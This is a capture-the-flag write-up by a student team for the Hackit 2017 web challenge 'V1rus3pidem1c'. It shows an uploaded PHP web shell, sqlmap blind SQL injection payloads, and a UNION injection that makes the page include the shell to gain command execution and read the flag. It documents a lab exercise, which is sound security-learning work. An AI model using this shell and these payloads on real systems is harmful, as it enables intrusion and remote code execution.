[Web] Hackit 2017 - V1rus3pidem1c 100

Web blindsqli, lfi, sqli Comments

V1rus3pidem1c
web100

Wasted

16

Description: Hackers created an automated site for virus attacks on the Government. You must find and catch them all!

Attachment: (none)

Webpage: http://tasks.ctf.com.ua:13372
Hint: (none)

After interacting a little bit with the page we can start taking some notes about the website:

1
2
3
GET parameter "Country" (Possible attacks like SQLi, LFI or even bash injection).
File Upload form (By uploading a PHP Script).  
The uploaded files appear to be uploaded into uploads folder.

Lets try uploading a php:

1
2
3
<?php
<pre>if($_GET['cmd']){system($_GET['cmd']);}</pre>
?>

Running some curl commands to check the status code of the file we are about to upload:

1
2
$ curl --write-out '%{http_code}' --silent --output /dev/null 'http://tasks.ctf.com.ua:13372/uploads/dnjefwh43jfh342fnewjfjndewefnu27fd.php'
404

We got a 404 (not found) which is normal we still didn’t upload our php file so lets do it:

1
2
$ curl --write-out '%{http_code}' --silent --output /dev/null 'http://tasks.ctf.com.ua:13372/index.php?country=Germany' -F "fileToUpload=@/home/teamrocketist/D/H/dnjefwh43jfh342fnewjfjndewefnu27fd.php"
200

Nice we got an 200 (OK) response! lets see if see if this is good news:

1
2
3
4
5
6
7
8
9
10
$ curl --write-out '%{http_code}' --silent --output /dev/null 'http://tasks.ctf.com.ua:13372/uploads/dnjefwh43jfh342fnewjfjndewefnu27fd.php'
200
$ curl 'http://tasks.ctf.com.ua:13372/uploads/dnjefwh43jfh342fnewjfjndewefnu27fd.php?cmd=ls'
<pre>
<?php
if($_GET['cmd']) {
  system($_GET['cmd']);
  }
?>
</pre>

We can see we have some good and bad news we uploaded a php file with success! but our php file isn’t executing our php code and why this is happening? The admin must have configured in the apache configuration files to not run php in this specific upload folder(uploads) or it has a .htaccess inside it blocking it.

Actually you could solve this challenge very easily if you uploaded a .htaccess with your own rules overwriting the original .htaccess but this wasn’t the intentional solution, after a while the admins fixed this and protected the .htaccess file so it couldn’t get overwritten, but I believe some other teams managed to solve this challenge like this.

But continuing with the intentional solution, lets try to get what’s left from the notes we took before maybe we can try some sql injection? 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
$ sqlmap -u "http://tasks.ctf.com.ua:13372/index.php?country=USA" --tables --threads=10 --exclude-sysdbs --dump
---
Parameter: country (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: country=USA' AND 6412=6412 AND 'lvwC'='lvwC

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: country=USA' AND SLEEP(5) AND 'buJa'='buJa
---
[16:51:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
Database: WHATAREYOUDOINGHERE
[1 table]
+-----------+
| countries |
+-----------+
Database: WHATAREYOUDOINGHERE
Table: countries
[10 entries]
+-----------+----------------+--------------+
| countryID | scriptPath     | countryName  |
+-----------+----------------+--------------+
| 1         | country/ge.php | Germany      |
| 2         | country/tu.php | Turkmenistan |
| 3         | country/ne.php | Netherlands  |
| 4         | country/se.php | Serbia       |
| 5         | country/tk.php | Turkey       |
| 6         | country/fr.php | France       |
| 7         | country/uk.php | UK           |
| 8         | country/ru.php | Russia       |
| 9         | country/us.php | USA          |
| 10        | country/ca.php | Canada       |
+-----------+----------------+--------------+

And we got an Blind sql injection dump (Thanks you sqlmap for doing the boring part for us!), but after dumping the database we didn’t find anything special, but if we start thinking how the page is actually working behind this, we can see the admin is selecting the path to a country php file which contains the upload form and INCLUDES it on the index.php page!!!! and here is the key for this challenge! We can try to combine SQLi and LFI with a union technique injection!

  1. Getting the column number:
1
2
3
4
# successfully shows up a upload form!
$ curl 'http://tasks.ctf.com.ua:13372/index.php?country=Germany\' order by 1-- qqq'
# Doest show a upload form!
$ curl 'http://tasks.ctf.com.ua:13372/index.php?country=Germany\' order by 2-- qqq'

  1. Performing union injection and include /etc/passwd:

    LFI AND SQLi

  2. Including our previous uploaded php script and and get remote code execution on the server!

1
2
3
4
5
6
7
8
9
10
11
12
$ curl "http://tasks.ctf.com.ua:13372/index.php?cmd=ls -lta&country=German' union all select 'uploads/dnjefwh43jfh342fnewjfjndewefnu27fd.php' -- frhQ"
"truncated html code"
total 72
drwxrwxrwx 2 1002 1002 40960 Aug 27 21:16 uploads
-r--r--r-- 1 1002 1002    49 Aug 27 07:36 .htaccess
drwxrwxr-x 5 1002 1002  4096 Aug 25 20:26 .
-r--r--r-- 1 1002 1002    44 Aug 25 20:26 iulersiueruigfuihseruhgi.php
drwxrwxr-x 4 1002 1002  4096 Aug 25 13:59 ..
-r--r--r-- 1 1002 1002  1667 Jul 28 20:54 index.php
drwxrwxr-x 2 1002 1002  4096 Jul 28 03:35 country
drwxrwxr-x 2 1002 1002  4096 Jul 28 03:34 static
"truncated html code"

The flag was in the php file iulersiueruigfuihseruhgi.php:

1
2
3
4
5
6
7
8
$ curl 'http://tasks.ctf.com.ua:13372/index.php?cmd=cat%20iulersiueruigfuihseruhgi.php&country=German%27%20union%20all%20select%20%27uploads/dnjefwh43jfh342fnewjfjndewefnu27fd.php%27%20--%20frhQ'
"truncated html code"
<pre>
<?php
$flag="h4ck1t{$QL&LFI=FR13ND$}";
?>
</pre>
"truncated html code"

TeamRocketISTCTF Team

Portuguese Computer Science Students